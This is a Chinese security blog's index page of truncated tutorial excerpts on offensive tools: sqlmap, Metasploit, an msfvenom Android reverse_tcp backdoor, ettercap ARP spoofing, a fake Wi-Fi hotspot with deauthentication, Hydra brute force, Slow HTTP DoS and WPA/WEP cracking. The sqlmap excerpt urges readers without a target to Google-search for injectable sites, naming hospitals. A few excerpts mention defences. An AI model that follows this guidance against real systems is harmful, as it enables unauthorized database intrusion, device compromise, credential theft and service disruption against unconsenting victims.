更新 2026.7.23安全478 字· 1 分钟 sqlmap是开源的SQL注入自动攻击工具,它可以自动的探测SQL注入点并且进一步控制网站的数据库。
Kali Linux默认安装了这个工具。
找到潜在的攻击目标
第一步是找到有SQL注入漏洞的网站。如果你没有特定攻击目标,可以使用Google搜索 php?id=1 (或php?id= + xx系医院):
更新 2026.7.23安全387 字· 1 分钟 Metasploit提供了很多辅助的模块,非常实用。今天介绍一个叫search_email_collector的模块,它的功能是查找搜索引擎(google、bing、yahoo),收集和某个域名有关的邮箱地址。
使用步骤: 启动msfconsole:
# service postgresql start # msfconsole 搜索模块:
更新 2026.7.23安全550 字· 2 分钟 Lynis是Linux平台上的一款安全漏洞扫描工具。它可以扫描系统的安全漏洞、收集系统信息、安装的软件信息、配置问题、没有设置密码的用户和防火墙等等。
Lynis是流行可靠的安全扫描工具。
前不久,Lynis更新了版本,Lynis发布了2.2.0。在这个版本上增加了新的特性和一些小的功能提升。我建议使用Lynis的最新版本2.2.0。
更新 2026.7.23安全603 字· 2 分钟 Metasploit可以在Linux、Windows和Mac OS X系统上运行。我假设你已安装了Metasploit,或者你使用的系统是Kali Linux。它有命令行接口也有GUI接口。
我使用的系统是Kali Linux,本文以这个系统为例。
图形用户界面接口:Armitage
更新 2026.7.23安全730 字· 2 分钟 我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。
本文演示怎么使用Metasploit入侵windows xp sp3。
启动msfconsole:
# msfconsole 选择一个漏洞:
更新 2026.7.23安全395 字· 1 分钟 文本演示怎么使用Kali Linux入侵Android手机。
Kali Linux IP地址:192.168.0.112;接收连接的端口:443。
同一局域网内android手机一部(android 5.1)
创建一个后门程序 在终端中执行:
# msfvenom -p android/meterpreter/reverse_tcp …
更新 2026.7.23安全862 字· 2 分钟 ettercap是执行ARP欺骗嗅探的工具,通常用它来施行中间人攻击。
我还介绍过另一个arp欺骗工具-arpspoof
我使用的是Kali Linux 2.0;在开始使用ettercap之前,先配置一下:
编辑配置文件/etc/ettercap/etter.conf:
更新 2026.7.23安全约 1.1k 字· 3 分钟 中间人攻击也叫Man-In-The-Middle-Attack。
我假设你已经知道中间人攻击的基本概念,引用一段wikipedia:
中间人攻击(Man-in-the-middle attack,缩写:MITM)是指攻击者与通讯的两端分别建立独立的联系,并交换其所收到的数据,使通讯的两端认为他们正在通过一个私密的连接与对方直接对话,但事实上整个会话都被攻击者 …
更新 2026.7.23安全约 1.1k 字· 3 分钟 集线器、交换机和路由器都是计算机网络设备,而且非常容易混淆。那么集线器、交换机和路由器有什么区别呢?
用简单的话说,就是智商高低。路由器最智能、集线器最傻。
集线器、交换机和路由器都允许你把一个或多个计算机连接到其他计算机、网络设备等。每个都有多个网络接口,允许你插入网线接入网络,但是内部原理不同。下面我们分别看一下这些设备。
更新 2026.7.23安全991 字· 2 分钟 全世界,现在大约50%的网站没有使用SSL加密,天朝尤其多。
我们都知道通过HTTP发送的数据都是明文,没有使用任何加密,即使是在数据敏感的登录页面。
本文的目的是:如果你在不熟悉的网络环境中,要注意提高警惕。
没有人希望自己的密码暴露给他人,so,不要嗅探(狗)他人的密码。
更新 2026.7.23安全409 字· 1 分钟 我这里使用的Kali Linux,它默认安装了WPScan。
在使用WPScan之前,先更新它的漏洞数据库:
# wpscan –update 扫描wordpress用户
wpscan -–url [wordpress网址] –-enumerate u 以我的网站为例:
# wpscan --url http://blog.topspeedsnail.com …
更新 2026.7.23安全448 字· 1 分钟 Hydra是非常高效的网络登录破解工具,它可以对多种服务程序执行暴力破解(SSH、VNC等等)。
防止这种攻击其实很容易,方法很多。以SSH为例:
Ubuntu:使用Port Knocking隐藏SSH端口
在Ubuntu中用Fail2Ban保护SSH
CentOS 7安装使用Fail2Ban保护SSH
更新 2026.7.23安全763 字· 2 分钟 本帖介绍怎么创建假的wifi热点,然后抓取连接到这个wifi用户的敏感数据。我们还会给周围的无线路由器发送未认证的包,使这些路由器瘫痪,强迫用户连接(或自动连接)我们创建的假wifi热点。
这种攻击也叫”水坑攻击”-把其他用户都聚集到一个”坑”中。
更新 2026.7.23安全186 字· 1 分钟 pdfcrack是破解PDF保护密码的Linux命令行工具。
安装pdfcrack Debian系列:
# apt install pdfcrack 暴力破解 # pdfcrack -f filename.pdf -n 6 -m 8 -c 0123456789 暴力破解密码是漫长单调的过程。
上面使用的参数解释:
-n:密码最短多少个字符 -m:密码最长多少 …
更新 2026.7.23安全579 字· 2 分钟 Slowhttptest是一个依赖于实际HTTP协议的Slow HTTP DoS攻击工具,它的设计原理是要求服务器所有请求被完全接收后再进行处理。
SlowHTTPTest是一款对服务器进行慢攻击的测试软件,所谓的慢攻击就是相对于cc或者DDoS的快而言的,并不是只有量大速度快才能把服务器搞挂,使用慢攻击有时候也能到达同一效果。slowhttptest包含了 …
更新 2026.7.23安全213 字· 1 分钟 RDP是远程桌面协议。
$ nmap your_target Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-20 17:29 CST Nmap scan report for ns514636.ip-192-95-xx.net (192.95.xx.xx) Host is up (0.28s …
更新 2026.7.23安全946 字· 2 分钟 来自wikipeida:
Wi-Fi保护设置(简称WPS,全称Wi-Fi Protected Setup)是一个无线网络安全标准,旨在让家庭用户使用无线网络时简化加密步骤。此标准由Wi-Fi联盟(Wi-Fi Alliance)于2006年制定。
在2011年12月28日安全专家Stefan Viehbock报出此标准的一个重大安全漏洞,此漏洞允许远程攻击者使 …
更新 2026.7.23安全约 1.3k 字· 3 分钟 Kali Linux能做很多事,但是它主要以渗透测试及’破解wifi密码’闻名。
如果你使用Macbook 请看 使用macbook破解WPA/WPA2 wifi密码
要求:
安装有Kali Linux的计算机 支持监控模式的网卡,笔记本电脑一般都支持 字典文件 时间和耐心 这种攻击需要字典文件,一个好的字典至关重要。我以Kali Linux自带的 …
更新 2026.7.23安全278 字· 1 分钟 WEP是无线路由器最初广泛使用的一种加密方式,这种加密方式非常容易被破解。
目前很少有人使用wep加密方式,但是还是会有。
建议:使用WPA/WPA2做为加密方式。
抓包和“破解wpa/wpa2”方法一样,参考其中的前4步
5) 加快Beacons和Data数据的收集速度 和破解WPA/WPA2不同的是,它只要抓取到足够的Beacons和Data数据就可以破 …
更新 2026.7.23安全543 字· 2 分钟 文本仅供学习交流。
我使用的系统是macbook pro 15:
安装aircrack-ng 使用homebrew安装,命令:
brew install aircrack-ng 抓包-抓取带密码的握手包 macbook自带了一个wifi工具:airport。
sudo ln -s …